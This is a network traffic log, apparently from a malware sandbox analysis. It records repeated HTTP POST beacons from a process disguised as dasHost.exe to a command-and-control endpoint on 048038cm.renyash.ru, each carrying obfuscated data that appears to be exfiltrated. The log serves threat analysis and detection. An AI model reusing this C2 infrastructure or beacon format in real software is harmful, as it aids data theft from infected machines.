                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:12.126060009 CET | 2584 | OUT | Data Raw: 56 56 59 50 56 44 55 5c 5d 5f 52 56 5a 59 58 5f 57 5d 5f 51 54 53 55 48 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VVYPVDU\]_RVZYX_W]_QTSUHR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$^+,9";4S Z-+!>%=>?T4/W(?<-35#(,%\ ![(#
                                                                        Dec 28, 2024 20:43:12.953546047 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:13.241085052 CET | 806 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:13 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1QGTG2uyjOPJs27TDlePVfDKrM16NjEdEzyRJgndIfpMSJnl3e812xelobFe2GX3of6S%2F8ur%2Fa%2BtTKnQurXZOSOZPmHIXmXrqZqAK1dc7akMAkaMMErvaMKsUAFMAYn%2F6tNKhUge"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409b8faf86a5e-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3836&min_rtt=1764&rtt_var=4806&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=79594&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        19 | 192.168.2.4 | 49781 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:13.515544891 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:13.860470057 CET | 2584 | OUT | Data Raw: 56 57 5c 53 53 42 50 58 5d 5f 52 56 5a 5d 58 58 57 5c 5f 5b 54 50 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VW\SSBPX]_RVZ]XXW\_[TPU@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$[<<_!8+#5Y/(+4>1+-$#:4=?+^-)6 >%\ ![(3
                                                                        Dec 28, 2024 20:43:14.646616936 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:14.887959003 CET | 807 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:14 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rAN2SB2IedNJrrypGZXibJrM0c2LxBNvg%2F%2FIGNiJuBDPqDy5%2BIvpD%2BJvmHTeAp5qzyMP360nGl5baDI4ghG6Ic5MonGbT4A5TrcOabzz4jFJN6ax8rpXHA3s6HS4PsNQxCJMYLsg"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409c39c9d17a9-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=7750&min_rtt=1572&rtt_var=12945&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=28629&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        20 | 192.168.2.4 | 49783 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:15.230312109 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:15.579382896 CET | 2584 | OUT | Data Raw: 53 50 5c 54 53 41 50 5f 5d 5f 52 56 5a 59 58 55 57 5f 5f 5a 54 5d 55 45 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SP\TSAP_]_RVZYXUW__ZT]UER]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$?&!+,[4/(+ >!==+V4_7Q=,'::#Y50>%\ ![(#
                                                                        Dec 28, 2024 20:43:16.407732964 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:16.662080050 CET | 804 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:16 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2895amsfseQAJllQCPboMmiYYJltMPcj0DcTIgQBS3HtuWwllF6AIqX6s8o%2F8SLyGAiH8H1AtH%2FKXpM3Rc2b7gN0X6EFJK4duXT7MxtCGZCUPrQxz5m6AEafQqr3TMPw1X9%2F6mPr"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409ce8e8a4340-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3883&min_rtt=1964&rtt_var=4574&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=84310&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        21 | 192.168.2.4 | 49789 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:16.904313087 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:17.251120090 CET | 2584 | OUT | Data Raw: 56 52 5c 55 56 41 55 5e 5d 5f 52 56 5a 5c 58 5e 57 5e 5f 5f 54 53 55 43 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VR\UVAU^]_RVZ\X^W^__TSUCR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'+,-\6' (Y-+ =*=")7T)?3.*+[" ]*,%\ ![(7
                                                                        Dec 28, 2024 20:43:18.081552029 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:18.333076000 CET | 801 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:18 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FxVGpcd7WFHpKQEDiHhAJKKgSHXaekhsXV02tAmHMujjUOu8NTBFnoDOqxsRR9ugBkPa61H8p7vmOIANw5etzGrZbGJ6XEfDyaJhBrvWpYbPkv%2FxGhckBmDxGgp3HT8754uWjWzq"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409d90c11437f-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3413&min_rtt=1675&rtt_var=4104&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=93715&cwnd=78&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        22 | 192.168.2.4 | 49795 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:18.628122091 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:18.985600948 CET | 2584 | OUT | Data Raw: 56 54 5c 56 56 47 55 5e 5d 5f 52 56 5a 50 58 58 57 5e 5f 5e 54 56 55 49 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VT\VVGU^]_RVZPXXW^_^TVUIR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'+/:" 6#,+?7.*3Q79(=?^9)\!0)%\ ![(
                                                                        Dec 28, 2024 20:43:19.796606064 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:20.039907932 CET | 815 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:19 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y%2BX8HhntjMow1T5TOsZXtS3C%2FNA2xjvz4cJyLTb%2FUjGm2izLanQW%2BL75XyBuc2cDVI4I2f3oUqt8cw%2BTdBMsp%2BhORY1gRPN13gAiXidWTsTduK73TTSuneqWNGVHSN5u%2F%2BPW59Kq"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409e3cf0c8c47-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=8856&min_rtt=1981&rtt_var=14493&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=25621&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        23 | 192.168.2.4 | 49796 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:20.611946106 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:20.969981909 CET | 2584 | OUT | Data Raw: 56 51 59 51 56 40 55 5f 5d 5f 52 56 5a 5f 58 54 57 51 5f 5a 54 5d 55 43 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VQYQV@U_]_RVZ_XTWQ_ZT]UCR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$_)<:6'4,?X!>&X=$ */V>?,)+50]=<%\ ![(
                                                                        Dec 28, 2024 20:43:21.789408922 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:22.041160107 CET | 808 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:21 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=im1%2F%2BXFwyJjeSg9bpbhd%2BbamwiYWcxiRFJ5HJHKrxnJY37UBwXLvNDJQ2aW9cl5wbgkoUQmcD1mFtkFuwk3KggSaYhwmb4Sri1wSAeAAuJ%2BCbbVR7PMW2p8cBGUiQVeUytXP%2B5RG"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409f02aef4398-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4756&min_rtt=1658&rtt_var=6818&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=55208&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        24 | 192.168.2.4 | 49802 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:22.275301933 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:22.626125097 CET | 2584 | OUT | Data Raw: 56 53 59 57 53 41 50 5f 5d 5f 52 56 5a 5d 58 5e 57 5f 5f 5e 54 54 55 43 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VSYWSAP_]_RVZ]X^W__^TTUCR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$() ;+ ,/+7Z#.)>/ ),><.]5V$=%\ ![(3
                                                                        Dec 28, 2024 20:43:23.359200001 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:23.608197927 CET | 821 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:23 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xs4hgF%2BX%2BxZOGG%2BnCQ4U%2BQdmyFLuzs9Mi%2FIa5H%2F%2F%2BCNA%2FQ18vx9zi28TqTrmxXrQbQdZe97bP%2Fx7y0RlY%2FRwGvK8Iv1rcN5lGAM00OSpOuH%2FS4PV%2BbOhk%2FQH1XI7Bv0ZRlB0LuQn"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409fa0a87f78f-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4513&min_rtt=1545&rtt_var=6517&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=57716&cwnd=136&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a
                                                                        Data Ascii: 42RZZ
                                                                        Dec 28, 2024 20:43:23.799776077 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        25 | 192.168.2.4 | 49808 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:24.052297115 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2576
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:24.407542944 CET | 2576 | OUT | Data Raw: 56 55 59 50 56 44 55 5b 5d 5f 52 56 5a 58 58 5c 57 50 5f 50 54 56 55 45 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VUYPVDU[]_RVZXX\WP_PTVUER]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$^)<>"?7([8/[ =&\+-8 #U*,*#!33(,%\ ![(
                                                                        Dec 28, 2024 20:43:25.190083027 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:25.535326004 CET | 799 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:25 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJd28vXYgtM6q7KgbMLJ91QFINq0zFeox0BZjqnUIdCGIGBLzrbwhRelDUGrXzqmuRhm3hOJ8gdVKIp4LVVtUpQO3HqD85UA9CQcO2yCbV9y2eCDZb1ak41CeXyXlzHdf7%2BkgFrz"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a056e0f4285-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4689&min_rtt=2128&rtt_var=5920&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2882&delivery_rate=64556&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        26 | 192.168.2.4 | 49814 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:25.806969881 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:26.157352924 CET | 2584 | OUT | Data Raw: 56 5b 59 53 56 44 55 5c 5d 5f 52 56 5a 50 58 5e 57 5d 5f 51 54 50 55 41 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: V[YSVDU\]_RVZPX^W]_QTPUAR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Z<,9"; ^ <X/[ ))=(#9?U)(:9(5V;[(,%\ ![(
                                                                        Dec 28, 2024 20:43:26.938030005 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:27.180099964 CET | 806 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:26 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zgGm3xK8Z6SFKl%2FYaJPYskwZNZRzj2yB1W6EUG0w2SgNRxUd%2F0GKuT%2FCeCPbWMALJVgkcuFov2Qo6dMYt5x48QGAmTrnGnJYMCQ1u3ByOWE3aVKCsWb%2Fm0fYaRJShiI5QLsnJnDK"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a10696d18b4-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4363&min_rtt=1458&rtt_var=6356&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=59114&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        27 | 192.168.2.4 | 49815 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:27.438606977 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:27.798027992 CET | 2584 | OUT | Data Raw: 56 51 59 5f 56 46 50 5d 5d 5f 52 56 5a 59 58 55 57 59 5f 58 54 5d 55 49 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VQY_VFP]]_RVZYXUWY_XT]UIR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$?Z%"+,4$/, .\= 7)(*0:9$5,>%\ ![(#
                                                                        Dec 28, 2024 20:43:28.739203930 CET | 25 | IN | HTTP/1.1 100 Continue
